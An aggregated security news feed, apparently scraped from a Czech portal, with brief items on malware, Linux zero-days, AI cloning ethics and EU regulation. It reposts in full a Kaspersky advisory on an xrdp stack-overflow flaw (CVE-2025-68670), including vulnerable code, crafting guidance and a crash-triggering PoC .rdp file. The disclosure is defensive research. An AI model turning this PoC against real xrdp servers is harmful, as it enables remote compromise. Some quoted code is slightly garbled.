Security-Portal.cz je internetový portál zaměřený na počítačovou bezpečnost, hacking, anonymitu, počítačové sítě, programování, šifrování, exploity, Linux a BSD systémy. Provozuje spoustu zajímavých služeb a podporuje příznivce v zajímavých projektech.

Kategorie

Former govt contractor convicted for wiping dozens of federal databases

Bleeping Computer - 1 hodina 53 min zpět
A 34-year-old Virginia man was found guilty of conspiring to destroy dozens of government databases after getting fired from his job as a federal contractor. [...]
Kategorie: Hacking & Security

New Linux PamDOORa Backdoor Uses PAM Modules to Steal SSH Credentials

The Hacker News - 1 hodina 57 min zpět
Cybersecurity researchers have disclosed details of a new Linux backdoor named PamDOORa that's being advertised on the Rehub Russian cybercrime forum for $1,600 by a threat actor called "darkworm." The backdoor is designed as a Pluggable Authentication Module (PAM)-based post-exploitation toolkit that enables persistent SSH access by means of a magic password and specific TCP port combination. Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

CVE-2025-68670: discovering an RCE vulnerability in xrdp

Kaspersky Securelist - 2 hodiny 37 min zpět

In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.

We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.

Client data transmission via RDP

Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:

{ [..SNIP..] char username[INFO_CLIENT_MAX_CB_LEN]; char password[INFO_CLIENT_MAX_CB_LEN]; char domain[INFO_CLIENT_MAX_CB_LEN]; char program[INFO_CLIENT_MAX_CB_LEN]; char directory[INFO_CLIENT_MAX_CB_LEN]; [..SNIP..] }

The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:

#define INFO_CLIENT_MAX_CB_LEN 512

When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.

if (ts_info_utf16_in( // [1] s, len_domain, self->rdp_layer->client_info.domain, sizeof(self->rdp_layer->client_info.domain)) != 0) // [2] { [..SNIP..] }

The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].

static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len) { int rv = 0; LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len); if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in")) { rv = 1; } else { int term; int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2, dst, dst_len); if (num_chars > dst_len) // [3] { LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow"); rv = 1; } / / String should be null-terminated. We haven't read the terminator yet in_uint16_le(s, term); if (term != 0) { LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term); rv = 1; } } return rv; }

Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].

{ unsigned int rv = 0; char32_t c32; char u8str[MAXLEN_UTF8_CHAR]; unsigned int u8len; char *saved_s_end = s->end; // Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK parser_stream_overflow_check(s, n * 2, 0, file, line); #endif // Temporarily set the stream end pointer to allow us to use // s_check_rem() when reading in UTF-16 words if (s->end - s->p > (int)(n * 2)) { s->end = s->p + (int)(n * 2); } while (s_check_rem(s, 2)) { c32 = get_c32_from_stream(s); u8len = utf_char32_to_utf8(c32, u8str); if (u8len + 1 <= vn) // [4] { /* Room for this character and a terminator. Add the character */ unsigned int i; for (i = 0 ; i < u8len ; ++i) { v[i] = u8str[i]; } v n -= u8len; v += u8len; } else if (vn > 1) { /* We've skipped a character, but there's more than one byte * remaining in the output buffer. Mark the output buffer as * full so we don't get a smaller character being squeezed into * the remaining space */ vn = 1; } r v += u8len; } // Restore stream to full length s->end = saved_s_end; if (vn > 0) { *v = '\0'; // [5] } + +rv; return rv; }

Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.

CVE-2025-68670: an RCE vulnerability in xrdp

The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.

x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax, int decode, char *resultBuffer) xrdp_login_wnd_create(struct xrdp_wm *self) xrdp_wm_init(struct xrdp_wm *self) xrdp_wm_login_state_changed(struct xrdp_wm *self) xrdp_wm_check_wait_objs(struct xrdp_wm *self) xrdp_process_main_loop(struct xrdp_process *self)

The code snippet where the vulnerable function is called looks like this:

char resultIP[256]; // [7] [..SNIP..] combo->item_index = xrdp_wm_parse_domain_information( self->session->client_info->domain, // [6] combo->data_list->count, 1, resultIP /* just a dummy place holder, we ignore */ );

As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.

static int xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax, int decode, char *resultBuffer) { int ret; int pos; int comboxindex; char index[2]; /* If the first char in the domain name is '_' we use the domain name as IP*/ ret = 0; /* default return value */ /* resultBuffer assumed to be 256 chars */ g_memset(resultBuffer, 0, 256); if (originalDomainInfo[0] == '_') // [8] { /* we try to locate a number indicating what combobox index the user * prefer the information is loaded from domain field, from the client * We must use valid chars in the domain name. * Underscore is a valid name in the domain. * Invalid chars are ignored in microsoft client therefore we use '_' * again. this sec '__' contains the split for index.*/ pos = g_pos(&originalDomainInfo[1], "__"); // [9] if (pos > 0) { /* an index is found we try to use it */ LOG(LOG_LEVEL_DEBUG, "domain contains index char __"); if (decode) { [..SNIP..] } / * pos limit the String to only contain the IP */ g_strncpy(resultBuffer, &originalDomainInfo[1], pos); // [10] } else { LOG(LOG_LEVEL_DEBUG, "domain does not contain _"); g_strncpy(resultBuffer, &originalDomainInfo[1], 255); } } return ret; }

As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).

To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.

PoC

As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:

alternate full address:s:172.22.118.7 full address:s:172.22.118.7 domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0 username:s:testuser

When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.

gef➤ bt #0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44 #1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78 #2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at./nptl/pthread_kill.c:89 #3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26 #4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79 #5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156 #6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26 #7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24 #8 0x000063654a2e5ad5 in ?? () #9 0x4141414141414141 in ?? () #10 0x00007adb00000a00 in ?? () #11 0x0000000000050004 in ?? () #12 0x00007fff91732220 in ?? () #13 0x000000000000030a in ?? () #14 0xfffffffffffffff8 in ?? () #15 0x000000052dc71740 in ?? () #16 0x3030305f70647278 in ?? () #17 0x616d5f6130333030 in ?? () #18 0x00636e79735f6e69 in ?? () #19 0x0000000000000000 in ?? ()

Protection against vulnerability exploitation

It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.

The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.

Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.

Vulnerability remediation timeline
  • 12/05/2025: we submitted the vulnerability report via https://github.com/neutrinolabs/xrdp/security.
  • 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
  • 12/15/2025: investigation and prioritization of the vulnerability began.
  • 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
  • 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
  • 01/27/2026: the patch was merged into the project’s main branch.
Conclusion

Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.

However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.

New Linux 'Dirty Frag' zero-day gives root on all major distros

Bleeping Computer - 2 hodiny 53 min zpět
A new Linux zero-day vulnerability, named Dirty Frag, allows local attackers to gain root privileges on most major Linux distributions with a single command. [...]
Kategorie: Hacking & Security

AI clones: the good, the bad, and the ugly

Computerworld.com [Hacking News] - 3 hodiny 38 min zpět

AI is capable of mimicking a real person. It’s clear this capability exists, and the ethics of using AI for this purpose are often very clear. But increasingly, new applications are leading to ethically murky results. 

The good

For example, the CEO of a company, or a politician, could choose to create a clone using AI tools, creating a chatbot plus an avatar — a digital twin — that can interact with people on their behalf. Silicon Valley is big on the idea: Meta’s Mark Zuckerberg and LinkedIn co-founder Reid Hoffman are working on, or have already created, digital twins of themselves. 

Cloned politicians include Pakistan’s Imran Khan, who used an authorized voice clone to campaign from prison, and New York City Mayor Eric Adams, who used voice-cloned robocalls to speak with constituents in languages like Mandarin and Yiddish.

This kind of use case is probably ethical — as long as the people interacting know that they’re dealing with a digital clone and not a real person. 

The bad

The flip side of ethical uses for AI-generated clones is the non-consensual (and therefore unethical) cases. And of these, there are already many. For instance:

Other unethical, non-consensual uses for AI cloning include deepfake videos, where a celebrity’s face is superimposed on a porn actor. In all the above examples, the ethics are clear. This is all very wrong. 

But with China leading the way in the emergence of AI clones, the ethics are becoming far murkier. 

And the ugly

One emerging trend involves workers using specialized software to build digital versions of their bosses or colleagues. The most prominent project driving this trend is Colleague Skill, which was posted in late March by its creator, a 24-year-old Shanghai-based engineer named Zhou Tianyi. 

Colleague Skill and its forks and copycats, which tend to be open source, enable people to upload chat histories, emails, and internal documents to create a functional persona that mimics a specific coworker’s professional expertise and communication style. The technology stack includes tools like Claude, Kimi, ChatGPT, DeepSeek API, OCR (Tesseract), and sentiment analysis modules.

Colleague Skill uses a person’s past communications to build a talking replica of their personality. If you think of a regular AI as a general student who knows a little bit about everything, this tool acts like a specialized mask that forces the AI to behave like one specific individual. 

In other words, it produces a chatbot with the knowledge and patterns of speech of a real person. 

Colleague Skill started as a satirical commentary on AI-driven layoffs. But some employees began using it in earnest to clone their colleagues. There are several stated reasons for doing so, including retaining institutional knowledge and having an instant sounding board to “discuss” plans and ideas with. 

A similar motivation is the use of AI to clone bosses, so employees can better predict how that boss might react to the employees’ work. 

In most of these instances, according to reports out of China, the creation of the boss-bot or colleague clone is nonconsensual. 

Is non-consensually basing a custom chatbot on a colleague or boss unethical? 

And then it got personal (and weird)

Tianyi, creator of Colleague Skill, later forked it into something called Ex-Partner Skill. The idea is to re-create a former partner with AI so the user can continue the relationship. 

It operates on the same technical engine but applies it to a much more personal part of life. Users upload photos, social posts, chat logs and other content. The AI chatbot can then mimic the former partner’s tone, catchphrases, and subtle linguistic nuances, something that, “truly sounds like them — speaks with their catchphrases, replies in their style, remembers the places you went together.”

This allows a person to simulate conversations with someone who is no longer in their life.

If Colleague Skill is in a grey area, Ex-Partner Skill is in a darker grey area. 

(Note: many of the original repositories for Ex-Partner Skill have been removed from public view in China or “sanitized” after regulatory pressure. But the framework reportedly continues to circulate in private developer circles, and similar tools are increasingly used for “digital resurrection.”)

Ethically, the concept feels like it exists on a wide spectrum somewhere between therapy at one end and revenge porn at the other. (It’s like revenge porn in the sense that when “content” consensually made by two people for one purpose is later used consensually by one person in a way that the other person might find objectionable.)

Or maybe it’s closer to the “deathbot” phenomenon, where an AI-generated simulation provides a fake version of the dearly departed. (In both cases, the user interacts with a digital twin of someone who is no longer present in one’s life.) In fact, some people in China are using Ex-Partner Skill as a deathbot for a deceased loved one. 

The lack of consent feels like an ethical lapse. But we don’t consider it unethical to think about, remember, imagine conversations with, or journal about ex-partners — or dead family members. 

Boosters of the Ex-Partner Skill idea say that conversations with digital exes are therapeutic. They point out that because it’s private, it’s not harassment or stalking or an invasion of privacy. Instead, they argue, it helps with personal reflection and emotional healing.

As for people who have died, according to Chinese media reports, some users say the tool gives them a sense of closure and allows them to say the things they wish they could have said to the real person. But is it really closure if one person is still obsessively trying to interact — or pretend to interact — with the other person?

It’s healthy to communicate. But it’s not communication when a person is by themselves talking to no one and sending messages to a person who never gets those messages.

While ex-bots are a thing these days in China, the trend is showing up elsewhere. Some Character.AI users outside of China have created chatbots based on ex-partners, even though  the company has changed its Terms of Service to explicitly ban the creation of bots using the likenesses of private individuals without their permission. 

The emergence of nonconsensual cloning of coworkers, bosses and ex-partners is a new challenge to our sense of right and wrong, and yet another way AI is challenging us to step up and figure out how to respond.

Kategorie: Hacking & Security

Linux Kernel Dirty Frag LPE Exploit Enables Root Access Across Major Distributions

The Hacker News - 5 hodin 26 min zpět
Details have emerged about a new, unpatched local privilege escalation (LPE) vulnerability impacting the Linux kernel. Dubbed Dirty Frag, it has been described as a successor to Copy Fail (CVE-2026-31431, CVSS score: 7.8), a recently disclosed LPE flaw impacting the Linux kernel that has since come under active exploitation in the wild. The vulnerability was reported to Linux kernel maintainers
Kategorie: Hacking & Security

Linux Kernel Dirty Frag LPE Exploit Enables Root Access Across Major Distributions

The Hacker News - 5 hodin 26 min zpět
Details have emerged about a new, unpatched local privilege escalation (LPE) vulnerability impacting the Linux kernel. Dubbed Dirty Frag, it has been described as a successor to Copy Fail (CVE-2026-31431, CVSS score: 7.8), a recently disclosed LPE flaw impacting the Linux kernel that has since come under active exploitation in the wild. The vulnerability was reported to Linux kernel maintainers Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Canvas login portals hacked in mass ShinyHunters extortion campaign

Bleeping Computer - 12 hodin 1 min zpět
The ShinyHunters extortion gang has breached education technology giant Instructure again, this time exploiting another vulnerability to deface Canvas login portals for hundreds of colleges and universities. [...]
Kategorie: Hacking & Security

New TCLBanker malware self-spreads over WhatsApp and Outlook

Bleeping Computer - 12 hodin 1 min zpět
A new trojan named TCLBanker, which targets 59 banking, fintech, and cryptocurrency platforms, uses a trojanized MSI installer for Logitech AI Prompt Builder to infect systems. [...]
Kategorie: Hacking & Security

LinkedIn illegally blocking free accounts from seeing ‘who’s viewed your profile’ data, group alleges

Computerworld.com [Hacking News] - 7 Květen, 2026 - 22:28

A LinkedIn feature that allows paid subscribers to view a list of visitors to their profile should be made available to all EU users free of charge to comply with the region’s General Data Protection Regulation (GDPR), a legal complaint launched by the None of Your Business (NOYB) digital rights group has claimed.

Filed this week in an Austrian court, the group’s argument is that LinkedIn’s ‘Who’s Viewed Your Profile’ feature contravenes the GDPR Article 15, which covers a subject’s right of access to their own data.

NOYB has a history of taking on tech companies. In 2025, Google was hit by a €325 million ($381 million) fine by French privacy regulator, the CNIL, over its data collection and advertising policies after a complaint by the group.

Contradictory policy

LinkedIn began offering users the ability to see who has viewed their profile around 2007, later turning this into a paywalled perk in a move that pre-dated the arrival of GDPR in 2018.

According to NOYB, this commercialization left non-subscription users in a bind. Profile visitor data should legally be accessible to EU citizens under GDPR, but when they ask for this via a formal Data Subject Access Request (DSAR), LinkedIn refuses access, citing data protection.

Despite this, if the user subscribes to a LinkedIn Premium Career plan starting at €30 per month ($40 per month in the US), the same data suddenly becomes accessible.

“It is particularly absurd that LinkedIn is using a supposed ‘data protection interest’ as an argument to deny the right of access to data under the GDPR,” argued NOYB’s press release.

In NOYB’s view, LinkedIn’s policy is contradictory. The company limits access to something that should legally be free because allowing access would undermine the incentive to pay for it.

“Either the data must not be accessible to anyone, or – if it is clear to the visitor that the data is visible – it must also be disclosed in accordance with Article 15 GDPR,” NOYB said. In its view, LinkedIn’s policy of charging to access this data is illegal and the company should be fined to prevent future breaches.

Right to view

LinkedIn will doubtless point out to the Austrian Data Protection Authority that all users, including free subscribers, can opt out of having their profile visit made visible by toggling off the feature in Settings/Visibility tab/’Visibility when viewing other profiles’. Then each visit a user makes to another profile is recorded as one by an ‘Anonymous LinkedIn Member’. Free users can also see the last five visitors to their profile, as long as those users have not selected this anonymity setting.

It’s possible the company will further argue that, under Article 15, the rights of users to know who has viewed their data conflicts with the rights of other users to maintain their own privacy.

When contacted for response, a LinkedIn spokesperson sent the following statement: “This assertion [by NOYB] is false. Not only is it incorrect that only Premium members can see who has viewed their profile, but we also satisfy GDPR Article 15 by disclosing the information at issue via our Privacy Policy.”

According to Helen Brain, partner and head of commercial at Square One Law in the UK, the case would cause problems for LinkedIn’s lawyers even if the outcome remained uncertain.

“NOYB appears to have a strong argument that LinkedIn is breaching GDPR in one way or the other, but it’s impossible to say how likely they are to succeed before we see LinkedIn’s counter-arguments,” she said.

The complaint is on strong ground when arguing that profile visits should fall under GDPR Article 15 Right of Access. “If the viewer’s personal data is private and shouldn’t be disclosed in response to a DSAR by the viewed person, logically that means the viewer’s personal data should not be disclosed to premium account holders either,” said Brain. “If NOYB is successful in its complaint, the Austrian Data Protection Authority could ultimately issue a fine, and that could be substantial.” 

However, predicting the wider effect on technology companies using the same ‘data as a feature’ to incentivize paid subscriptions is difficult in advance of a ruling. If NOYB prevails, LinkedIn could be ordered to stop its disclosure of profile searchers or, alternatively, to make this available free of charge in response to DSARs.

However, Brain believed the issue might come down to the way consent is gained. “Even if LinkedIn is ordered to change what it is doing, it will find a new way to gain consent to permit the disclosures of searchers lawfully and continue to charge for the data they gather.”

Kategorie: Hacking & Security

Mozilla says 271 vulnerabilities found by Mythos have "almost no false positives"

Ars Technica - 7 Květen, 2026 - 21:18

The disbelief was palpable when Mozilla’s CTO last month declared that AI-assisted vulnerability detection meant “zero-days are numbered” and “defenders finally have a chance to win, decisively.” After all, it looked like part of an all-too-familiar pattern: Cherry-pick a handful of impressive AI-achieved results, leave out any of the fine print that might paint a more nuanced picture, and let the hype train roll on.

Mindful of the skepticism, Mozilla on Thursday provided a behind-the-scenes look into its use of Anthropic Mythos—an AI model for identifying software vulnerabilities—to ferret out 271 Firefox security flaws over two months. In a post, Mozilla engineers said the finally ready-for-prime-time breakthrough they achieved was primarily the result of two things: (1) improvement in the models themselves and (2) Mozilla’s development of a custom “harness” that supported Mythos as it analyzed Firefox source code.

"Almost no false positives"

The engineers said their earlier brushes with AI-assisted vulnerability detection were fraught with “unwanted slop.” Typically, someone would prompt a model to analyze a block of code. The model would then produce plausible-reading bug reports, and often at unprecedented scales. Invariably, however, when human developers further investigated, they’d find a large percentage of the details had been hallucinated. The humans would then need to invest significant work handling the vulnerability reports the old-fashioned way.

Read full article

Comments

New PCPJack worm steals credentials, cleans TeamPCP infections

Bleeping Computer - 7 Květen, 2026 - 20:35
A new malware framework called PCPJack is stealing credentials from exposed cloud infrastructure while actively removing TeamPCP's access to the systems. [...]
Kategorie: Hacking & Security

Australia warns of ClickFix attacks pushing Vidar Stealer malware

Bleeping Computer - 7 Květen, 2026 - 20:00
The Australian Cyber Security Center (ACSC) is warning organizations of an ongoing malware campaign using the ClickFix social engineering technique to distribute  the Vidar Stealer info-stealing malware. [...]
Kategorie: Hacking & Security

Ivanti EPMM CVE-2026-6973 RCE Under Active Exploitation Grants Admin-Level Access

The Hacker News - 7 Květen, 2026 - 19:55
Ivanti is warning that a new security flaw impacting Endpoint Manager Mobile (EPMM) has been explored in limited attacks in the wild. The high-severity vulnerability, CVE-2026-6973 (CVSS score: 7.2), is a case of improper input validation affecting EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1. It allows "a remotely authenticated user with administrative access to achieve remote code
Kategorie: Hacking & Security

Ivanti EPMM CVE-2026-6973 RCE Under Active Exploitation Grants Admin-Level Access

The Hacker News - 7 Květen, 2026 - 19:55
Ivanti is warning that a new security flaw impacting Endpoint Manager Mobile (EPMM) has been explored in limited attacks in the wild. The high-severity vulnerability, CVE-2026-6973 (CVSS score: 7.2), is a case of improper input validation affecting EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1. It allows "a remotely authenticated user with administrative access to achieve remote code Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

PCPJack Credential Stealer Exploits 5 CVEs to Spread Worm-Like Across Cloud Systems

The Hacker News - 7 Květen, 2026 - 19:45
Cybersecurity researchers have disclosed details of a new credential theft framework dubbed PCPJack that targets exposed cloud infrastructure and ousts any artifacts linked to TeamPCP from the environments. "The toolset harvests credentials from cloud, container, developer, productivity, and financial services, then exfiltrates the data through attacker-controlled infrastructure while attempting
Kategorie: Hacking & Security

PCPJack Credential Stealer Exploits 5 CVEs to Spread Worm-Like Across Cloud Systems

The Hacker News - 7 Květen, 2026 - 19:45
Cybersecurity researchers have disclosed details of a new credential theft framework dubbed PCPJack that targets exposed cloud infrastructure and ousts any artifacts linked to TeamPCP from the environments. "The toolset harvests credentials from cloud, container, developer, productivity, and financial services, then exfiltrates the data through attacker-controlled infrastructure while attemptingRavie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Container Security Misconfigurations That Still Go Unnoticed

LinuxSecurity.com - 7 Květen, 2026 - 19:16
Container security has long carried a reputation for resilience, but attackers have increasingly shifted their focus toward something easier to exploit: the Kubernetes environments surrounding the containers themselves.
Kategorie: Hacking & Security

EU lawmakers strike provisional deal to soften AI Act

Computerworld.com [Hacking News] - 7 Květen, 2026 - 17:20

European Union member states and the European Parliament agreed early Thursday to push back the toughest deadlines under the bloc’s AI Act, giving enterprises more time to prepare for high-risk compliance.

Under the provisional deal between negotiators for the European Parliament and European Council, high-risk AI systems will face new deadlines of Dec. 2, 2027 for stand-alone systems and Aug. 2, 2028 for AI used in products covered by EU sectoral safety rules, a European Parliament statement said. The original deadline was Aug. 2, 2026.

The deal still needs formal adoption by both Parliament and Council before it can enter into law. The co-legislators intend to complete that step before Aug. 2. Until they do, the original deadline applies as drafted.

“Today’s agreement on the AI Act significantly supports our companies by reducing recurring administrative costs,” Marilena Raouna, Cyprus’s deputy minister for European affairs, said in a statement from the Council, which is composed of representatives of each of the EU’s 27 member states. Cyprus holds the rotating presidency of the Council, which negotiates on behalf of member states.

The breakthrough comes nine days after previous discussions collapsed without agreement.

Fewer restrictions, more time to implement

The provisional agreement removes overlapping rules for AI in machinery products, Parliament said. These will now follow only sectoral safety rules, with safeguards meant to ensure equivalent health and safety protection.

It also narrows what counts as a “safety component” under the AI Act. AI features that only assist users or improve performance will not automatically be treated as high-risk, the Parliament said, as long as a failure does not create health or safety risks.

For wider sectors such as medical devices, toys, lifts, machinery and watercraft, the co-legislators agreed on a mechanism to resolve overlaps between the AI Act and existing sectoral laws, the Council said in its statement.

The deadline for member states to set up AI regulatory sandboxes has been pushed back by a year to Aug. 2, 2027, the Council said. Watermarking obligations on AI-generated content, on the other hand, will apply earlier than the Commission proposed, from Dec. 2, 2026 instead of Feb. 2, 2027, the Parliament said.

Mid-size firms get more breathing room. Exemptions previously available only to small and medium-sized enterprises now extend to small mid-cap companies, the Council said. The deal also clarifies that the EU’s AI Office will supervise general-purpose AI systems centrally, with national authorities keeping responsibility in areas including law enforcement, border management, judicial authorities and financial institutions.

“With this agreement, we show that politics can move just as quickly as technology,” said Arba Kokalari, the Parliament’s co-rapporteur for the Internal Market and Consumer Protection committee. “We now make the AI rules more workable in practice, remove overlaps and pause the high-risk requirements.”

Parliament and Council also agreed to ban AI systems that create child sexual abuse material or that depict identifiable people in sexually explicit content without consent, the Parliament said. The ban covers placing such systems on the EU market, doing so without safety measures to prevent misuse, and using them to generate the content. Companies have until Dec. 2, 2026 to comply.

“Alongside simplification measures, we are banning nudification apps, a key part of the Parliament’s mandate, and, of course, the creation of child sexual abuse material using AI systems,” said Michael McNamara, the Parliament’s co-rapporteur for the Civil Liberties, Justice and Home Affairs committee.

What still applies

Several parts of the AI Act keep moving on their original schedule. Bans on unacceptable-risk AI have applied since February 2025, according to the European Commission. The general-purpose AI rules came into force in August 2025. The transparency obligations under Article 50, including disclosure for chatbot interactions, are set to apply from Aug. 2, 2026.

The provisional agreement is part of the seventh omnibus package on simplification, proposed by the Commission on Nov. 19 last year in response to the Draghi report on EU competitiveness.

Kategorie: Hacking & Security
Syndikovat obsah